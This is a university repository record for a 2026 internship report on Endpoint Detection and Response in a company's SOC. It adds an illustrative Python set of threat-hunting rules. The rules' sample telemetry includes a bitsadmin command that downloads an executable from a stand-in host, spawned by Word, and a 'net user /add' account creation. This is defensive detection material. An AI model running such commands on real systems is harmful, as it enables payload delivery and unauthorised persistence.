Operational Analysis of Endpoint Detection and Response (EDR) in the Security Operations Center (SOC) at PT Serasi Autoraya

Sinambela, Riyanda Cavin (2026) Operational Analysis of Endpoint Detection and Response (EDR) in the Security Operations Center (SOC) at PT Serasi Autoraya. Project Report. [s.n.], [s.l.]. (Unpublished)

File: 5025221100-Project_Report.pdf (Accepted Version, restricted to repository staff only)

Abstract

The increasing complexity of cybersecurity threats necessitates the implementation of effective detection and response mechanisms at the endpoint level. This Internship Report presents an operational analysis of Endpoint Detection and Response (EDR) within the Security Operations Center (SOC) under the Cyber Security & Compliance (CSC) Division of PT Serasi Autoraya. The methodology employed is descriptive-analytical, utilizing a case study approach based on direct involvement in SOC operational activities, including monitoring, investigation of detections and incidents, threat hunting, and analysis of endpoint telemetry data. Operational activities encompassed continuous monitoring of the EDR dashboard, investigation of suspicious activities on endpoints, and threat hunting across multiple threat scenarios. These scenarios included potential exploitation of EternalBlue, access to high-risk domains, use of local administrator accounts, and abuse of the Background Intelligent Transfer Service (BITS). In addition, more than 140 EDR queries were developed and managed, classified according to operational requirements and threat categories. Custom Indicators of Attack (IoAs) based on behavioral analysis were also designed to enhance proactive detection capabilities.
Based on the operational results, the EDR system recorded a total of 11,599 detections and 31 incidents, all of which were directly handled and investigated. The investigation results indicate that the majority of detections and incidents were classified as false positives after in-depth analysis of activity context, process trees, and validation in coordination with relevant teams. Overall, the findings of this internship demonstrate the strategic role of EDR in supporting SOC operations, improving the effectiveness of monitoring and investigation processes, and strengthening endpoint security posture through behavior-based detection and well-structured operational documentation.
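The abstract lists four hunting scenarios (possible EternalBlue exposure, access to risky domains, use of local administrator accounts, BITS abuse) and behavior-based custom IoAs, and notes that most hits turned out to be false positives after process-tree and team validation. The following added example is not code from the report or from PT Serasi Autoraya; it shows what such behavior-based rules look like when expressed as plain functions over a flat telemetry export. The event schema, field names, host names, the corporate address range and the blocklisted domain are all constructed assumptions, and the rule for the deployment agent (`ccmexec.exe`) illustrates how an expected false-positive source is excluded up front rather than triaged by hand each time.

```python
"""Behaviour-based hunting rules over constructed endpoint telemetry.

Added illustration, not code from the report or the company. The event
schema, sample events, corporate range and blocklist entry are assumptions.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Callable, Dict, List, Optional

# Constructed telemetry: one flat dict per event, as an EDR export might provide.
EVENTS: List[Dict] = [
    {"host": "LAPTOP-01", "type": "process", "user": "CORP\\alice", "parent": "explorer.exe",
     "image": "winword.exe", "cmdline": "winword.exe report.docx"},
    {"host": "LAPTOP-01", "type": "process", "user": "CORP\\alice", "parent": "winword.exe",
     "image": "bitsadmin.exe",
     "cmdline": "bitsadmin.exe /transfer job /download http://example.invalid/a.exe C:\\Users\\Public\\a.exe"},
    {"host": "SRV-02", "type": "process", "user": "SRV-02\\Administrator", "parent": "cmd.exe",
     "image": "net.exe", "cmdline": "net user backup_svc /add"},
    {"host": "LAPTOP-03", "type": "dns", "user": "CORP\\bob", "query": "updates.example.invalid"},
    {"host": "LAPTOP-03", "type": "dns", "user": "CORP\\bob", "query": "login.evil-domain.invalid"},
    {"host": "FS-01", "type": "network", "direction": "inbound", "dst_port": 445, "src_ip": "203.0.113.7"},
    {"host": "FS-01", "type": "network", "direction": "inbound", "dst_port": 445, "src_ip": "10.0.5.12"},
    {"host": "DEPLOY-01", "type": "process", "user": "CORP\\sccm_svc", "parent": "ccmexec.exe",
     "image": "bitsadmin.exe",
     "cmdline": "bitsadmin.exe /transfer patch /download http://wsus.corp.invalid/kb.msu C:\\Windows\\Temp\\kb.msu"},
]

RISKY_DOMAINS = {"login.evil-domain.invalid"}      # constructed blocklist entry
BENIGN_BITS_PARENTS = {"ccmexec.exe"}              # assumed software-deployment agent
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
CORP_NETS = [ip_network("10.0.0.0/8")]             # assumed internal address range


@dataclass
class Hit:
    rule: str
    severity: str
    host: str
    reason: str


def rule_bits_abuse(e: Dict) -> Optional[Hit]:
    """bitsadmin.exe fetching a remote file; known deployment agents are excluded."""
    if e.get("type") != "process" or e.get("image", "").lower() != "bitsadmin.exe":
        return None
    cmd = e.get("cmdline", "").lower()
    if "/transfer" not in cmd or "http" not in cmd:
        return None
    parent = e.get("parent", "").lower()
    if parent in BENIGN_BITS_PARENTS:
        return None  # expected false-positive source: patch deployment
    sev = "high" if parent in OFFICE_APPS else "medium"
    return Hit("bits_abuse", sev, e["host"], f"bitsadmin download spawned by {parent}")


def rule_local_admin(e: Dict) -> Optional[Hit]:
    """Built-in local Administrator (host-scoped, not a domain account) running a process."""
    if e.get("type") != "process":
        return None
    domain, _, name = e.get("user", "").partition("\\")
    if domain.upper() == e["host"].upper() and name.lower() == "administrator":
        return Hit("local_admin_use", "medium", e["host"], f"local Administrator ran {e['image']}")
    return None


def rule_risky_domain(e: Dict) -> Optional[Hit]:
    """DNS lookup of a domain on the blocklist."""
    if e.get("type") == "dns" and e.get("query", "").lower() in RISKY_DOMAINS:
        return Hit("risky_domain", "medium", e["host"], f"DNS query for {e['query']}")
    return None


def rule_smb_exposure(e: Dict) -> Optional[Hit]:
    """Inbound SMB (445) from outside the internal range: exposure worth checking."""
    if e.get("type") != "network" or e.get("direction") != "inbound" or e.get("dst_port") != 445:
        return None
    src = ip_address(e["src_ip"])
    if any(src in net for net in CORP_NETS):
        return None
    return Hit("smb_from_untrusted", "high", e["host"], f"inbound SMB from {e['src_ip']}")


RULES: List[Callable[[Dict], Optional[Hit]]] = [
    rule_bits_abuse, rule_local_admin, rule_risky_domain, rule_smb_exposure,
]


def hunt(events: List[Dict]) -> List[Hit]:
    """Run every rule over every event and collect the hits."""
    return [h for e in events for h in (r(e) for r in RULES) if h is not None]


def summarize(hits: List[Hit]) -> Dict[str, int]:
    """Hit count per rule, the figure a SOC would track to spot noisy rules."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h.rule] = counts.get(h.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for h in hunt(EVENTS):
        print(f"[{h.severity:6}] {h.rule:18} {h.host:10} {h.reason}")
```

Running the block yields four hits and suppresses two events that would otherwise be noise (the deployment agent's BITS transfer and SMB from an internal address). The severity escalation for an Office parent reflects the process-tree context the abstract describes: the same command line is far more suspicious when its parent is a document viewer than when it is an administrator's shell.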

Item Type: Monograph (Project Report)
Uncontrolled Keywords: Endpoint Detection and Response (EDR), Security Operations Center (SOC), Threat Hunting, Indicator of Attack (IoA), Incident Response
Subjects: T Technology > TK Electrical engineering. Electronics. Nuclear engineering > TK5105 Data Transmission Systems
Divisions: Faculty of Industrial Technology > Informatics Engineering > 55201-(S1) Undergraduate Thesis
Depositing User: Riyanda Cavin Sinambela
Date Deposited: 22 Jan 2026 01:20
Last Modified: 22 Jan 2026 01:20
URI: http://repository.its.ac.id/id/eprint/130038
